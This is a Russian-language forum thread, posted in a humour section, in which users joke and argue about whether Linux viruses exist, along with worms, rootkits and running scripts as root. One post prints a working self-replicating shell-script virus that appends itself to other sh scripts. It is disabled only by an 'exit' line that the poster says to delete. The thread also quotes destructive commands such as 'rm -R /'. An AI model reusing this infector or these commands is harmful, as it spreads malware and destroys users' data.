Jump to content
Sign in to follow this  
Firebird

Вирусы в Linux

Recommended Posts

<graveworm> предлогаю приятелю переходить на линукс

<graveworm> он очень боица вирусов

<webster> да в линуксе стоит бояцо их)))

<webster> их же целых 9 ))))

<webster> и то половина не работает

<webster> с остальной половиной надо ебацо чтобы установить

Share this post


Link to post
Share on other sites

А что?! Я вот видел вирус в NIX! Вот прям своими глазами! Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe. Я даже сохранил у себя его, так, на всякий пожарный. И так, что мы имеем - вирус в линуксе быть может, а работать....хм...под wine что ли попробовать Laughing

Share this post


Link to post
Share on other sites

Hans R. Steiner

у кого-нибудь есть вирус для линукс?

AlexzAK

Я тоже хочу вирус!

Вирусы в Linux есть и не только в нем, но, как говорится - их мало. Мое мнение - гораздо опасней не бинарные (к-е будут запускаться только на узком числе машин), а скриптовые. Причины:

- sh или bash установлен на всех машинах

- эти оболочки во всех UNIX устроены одинаково

- в системе есть достаточно консольных программ не только для обычных гадостей, но и для вирусов.

Вот скажите. Вы скачали sh-скрипт, который распаковывает tar-gz архив. При этом вы запускаете его от root'а. А где гарантия, что в нем какой-нибудь вредоносной команды, вроде 'rm -R /', которая туда была вставлена умышленно? И в результате запуска оного скрипта вы остаетесь у разбитого корыта. Даже если вы запускаете его не от рута, команда 'rm -R $HOME/*' принесет пользователю много вреда - удалит все его файлы и настройки.

Интересующихся могу послать к статье Криса Касперского "Вирусы в UNIX, или Гибель Титаника II" (по-моему есть на www.wasm.ru). Вот пример очень простого sh-вируса:

#!/bin/sh

#Вирус "sh-450". Удалите эту и строку и "exit", чтобы вирус мог получить управление.

exit

for F in *

do

#Если в первой строке найдено "#!" и "/sh", значит $F - sh-скрипт

if [ "$(head -c9 "$F" | grep -s -E -H "#!" 2>/dev/null)" != "" ]; then #This $F - a Script

if [ "$(head -c9 "$F" | grep -s -E -H "/sh" 2>/dev/null)" != "" ]; then #$F - a sh-Script

if [ "$(tail -n1 "$F" 2>/dev/null)" != "#Virus v.1.1" ]; then #$F - not infected

tail -12 $0 >> "$F" 2>/dev/null;

fi

fi

fi

done

#Virus v.1.1

Этот скрипт ищет в текущем каталоге все не зараженные sh-скрипты (в конце к-х нет '#Virus v.1.1') и копирует в их конец последние 12 строчек своего тела. Это очень простой пример. Есть еще полиморфные и закодированные вирусы, и такие, у к-х умышленно усложнен алгоритм чтобы ни пользователи, ни антивирусы не поняли алгоритм его работы.

lcd_swat

Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe.

AccessD

ага, wine'ом

Нет, это - Windows-гадости, к UNIX они не имеют никакого отношения! Бинарных вирусов, скомпилированных для Linux всего-лишь 50-60. Мне неизвестно - сколько скриптовых.

Не стоит думать что если в UNIX нет вирусов - то она безопасна. В этой системе другая раскладка сил. Для размножения вирусов чтобы программа была запущена от root'а. Размножение вирусов практически ограничено потому что никто не будет от root'а запускать офисную или прикладную программу, - в основном запускаются те, к-е были созданы во время установки системы. В Windows 98% юзеров сидят под администратором, поэтому любая запущенная программа может писать в другую программу.

А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows, несмотря на то, что даже Linux встречается в тысячи раз реже, чем Windows. Черви спокойно существуют в UNIX-системах (хотя бы про червь Морриса все слышали - поражал BSD 4), есть черви Slapper и Scalper. Во-первых играет роль наличие исходников уязвимых программ, во-вторых, заплатки выпускаются реже (посмотрите на FreeBSD - 1/3 дыр еще не закрыта , хотя для некоторых из них уже есть эксплоиты). И в-третьих, сами заплатки устанавливаются реже - их установка и новых версий гораздо проблематичнее:

1) установка программ в UNIX дольше и сложнее, чем в Windows

2) после обновления программы может потребоваться обновление других программ, вплоть до ядра.

В UNIX также более распространены руткиты (скрывающие свое присутствие в системе). В Windows они практически не нужны - ведь все программы в 98% случаев итак запускаются от Администратора.

Итак, под UNIX никогда не будет много бинарных вирусов (а вот скриптовых - может быть больше). А вот новые черви и руткиты будут гораздо более знаменитыми.

Так что... не огорчайтесь - на каждую старуху своя пруха!

Share this post


Link to post
Share on other sites

Цитата:

Интересующихся могу послать к статье Криса Касперского "Вирусы в UNIX, или Гибель Титаника II"

попадалась несколько лет назад.. вода водой, человеку видать писать уже нечего было, вот и решил ещё куда-нибудь залезть.

Share this post


Link to post
Share on other sites

2 AndreyMust19

Мужчина, вы серьезны как рак легких в своих рассуждениях. Теперь внимание вопрос: вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

Я вот пользуюсь системой с 2001 года. Последние года три-четыре GNU/Linux у меня стоит дома и на работе. И при этом я лично не сталкивался с какими либо вирусами и т.п. Я что-то делаю не так?

Вот об этом и были все ШУТКИ в этом топике (а мы с вами в разделе "Юмор" назодимся, если что) Smile

Но вы все же смогли удачно пошутить. В частности, имеется в виду фраза: "А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows". Это развеселило.

И еще нужно понимать, что запуск чего бы то ни было от root - это довольно неумное действие. Тем более в вашем примере (когда скачал невесть что и давай его пускать от рута не глядя). А вот если будете пускать от пользователя, то масштабы бедствия ограничатся проблемами в домашней директории пользователя и директориями, на которые он имеет права на запись. При этом сама система не навернется. А вы ведь делаете регулярные бэкапы, да? Следовательно и восстановить пользовательскую директорию не проблема, да? Smile

Share this post


Link to post
Share on other sites

Вайт, ты просто линуксом пользоваться не умеешь... по этому у

тебя и вырусов нет... ты не умеешь их правильно искать и

запускать (видимо, я тоже не умею... за шесть лет практически

полного необщения с виндовсом, разучился... все навыки

растерял) :)

кстати:

http://ru.wikipedia.org/wiki/Список_компьютерных_вирусов_и_ч ервей_под_Linux

Но... лично я, вживую, ни одного не видел... и на самом деле, я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один, хотя бы в конкретной, отдельно взятой системе :)

Share this post


Link to post
Share on other sites

To Legalizer, Hans R. Steiner:

кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй )))

Конец там был что-то вроде - "вы хотите уподобиться такому страусу? а я нет!" ))

Share this post


Link to post
Share on other sites

Спациально нашел статью этого страуса :)

"Что бы там не говорили фанатики UNIX, но вирусы размножаются и на этой платформе. Отмахиваться от этой проблемы – означает уподобиться страусу. Вы хотите быть страусами? Я думаю – нет!"

http://xakforum.ru/index.php?topic=107.0

"Если на машине постоянно обновляется большое количество программного обеспечения (в том числе и создаваемого собственными силами), привилегии на модификацию исполняемых файлов становятся просто необходимы, в противном случае процесс общения с компьютером из радости рискует превратиться в мучение."

Ч..еловек, из страха перед большой птицей, решил заняться поиском привидений и охотой на ведьм :)

В общем, если почитать статью, хохма на хохме, косяк на косяке, а Касперский - страус :)

Share this post


Link to post
Share on other sites

AccessD писал(а) Mon, 09 March 2009 20:38

кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй )))

Конец там был что-то вроде - "вы хотите уподобиться такому страусу? а я нет!" ))

Человеку деньги надо зарабатывать, а Вы шутки шутите!

Share this post


Link to post
Share on other sites

Legalizer

Цитата:

вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок).

Цитата:

Это развеселило.

А я - серьезно. Sad

AccessD

Цитата:

вода водой,

я не советую эту статью, я вам ее назвал только чтобы е возникали вопросы "откуда ты это узнал?".

Hans R. Steiner

Цитата:

я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один

Вот поэтому я и говорю - забудьте о вирусах! Есть черви и руткиты.

Share this post


Link to post
Share on other sites

Черви - в ту же стопку, что и вирусы :)

Руткиты - для этого надо сперва заиметь доступ к моим

системам... а сие, с целью установки руткитов, рискованно для

здоровья :)

В общем, если взять любую, даже самую тупую книгу по

информационной безопасности, Вы там сможете найти на первых же

страницах, что если на Вас кто-то положит глаз, максимум что Вы

сможете сделать - довести систему до уровня, когда взлом будет

нерентабельным с точки зрения соотношения затрат к выгоде... все

остальные случаи - либо кривые руки админа, либо сказки на

ночь... забудьте... вирусов и червей под линукс нет, а те что

есть и при этом у Вас работают, написаны специально для Вас, а

если так, Вам терять уже нечего ;)

Share this post


Link to post
Share on other sites

AndreyMust19 писал(а) Wed, 11 March 2009 00:08

Legalizer

Цитата:

вы лично видели вирус под GNU/Linux _в диком виде_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок).

Так на вопрос вы не ответили Smile Был такой вирус в вашей жизни?

А пугать меня вам не положено. Это же форум в интернетах, а их я не очень боюсь Smile

Share this post


Link to post
Share on other sites

Весело. Smile

Тут вот такой замечательный скриптик был приведён... А что, вы всем скриптам, которые попадаются, тут же даёте права на запуск? Ну и ещё повеселило описание про сложность обновления системы... Неужели apt-get update && apt-get dist-upgrade в кроне раз в неделю сложнее, чем обновление всего софта, что есть в оффтопике руками? Что-то с трудом верится.

А что касается вирусов под никсы в общем, нашёл как-то сайтик, где были исходники целых девяти вирусов... Но, видимо, у меня руки не из того места растут. Шесть из них я не смог скомпилить, а оставшиеся три не запустились. Sad

Share this post


Link to post
Share on other sites

Legalizer

Цитата:

Так на вопрос вы не ответили

Нет, не видел, но:

Если я это не вижу, то не означает что этого не существует.

P.S. а правильный вирус и не должен делать так, чтобы его видели.

cppmm

Цитата:

А что, вы всем скриптам, которые попадаются, тут же даёте права на запуск?

А зачем нам скрипт без этого атрибута? Конечно не тут же, почитать сначала надо - что он делает. Но ведь скрипт можно написать так, что смысла его никто не поймет (как язык Си). Но запутанность алгоритма скрипта - не признак его зараженности. Ведь есть еще "упаковщики" языков, которые уменьшают размер скрипта / исходника:

- убирая все комментарии, лишние пробелы и табуляцию

- изменяет имена переменных, меток, функций на более короткие

- возможно даже переименовывает типы (н-р unsigned char -> uc, а unsigned long -> ul).

Цитата:

нашёл как-то сайтик, где были исходники целых девяти вирусов... Но, видимо, у меня руки не из того места растут.

Ну... был такой червь Морриса, который распространялся исходными текстами, компилировал их на зараженной машине и отправлял полученное тело следующей машине. И вот таким макаром он парализовал всю сеть. Так что или у вас

Цитата:

руки не из того места растут

или сами вирусы написаны немультиплатформенными (привязаны к определенной версии системы).

Share this post


Link to post
Share on other sites

Цитата:

Ну... был такой червь Морриса, который распространялся исходными текстами, компилировал их на зараженной машине и отправлял полученное тело следующей машине. И вот таким макаром он парализовал всю сеть. Так что или у вас

А вам известно, что собирался он на строго определённой платформе?

Share this post


Link to post
Share on other sites

2 AccessD

Видимо нет.

А ведь в первом сообщении этого топика все написано:

"<webster> и то половина не работает

<webster> с остальной половиной надо ебацо чтобы установить"

Smile

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

×
×
  • Create New...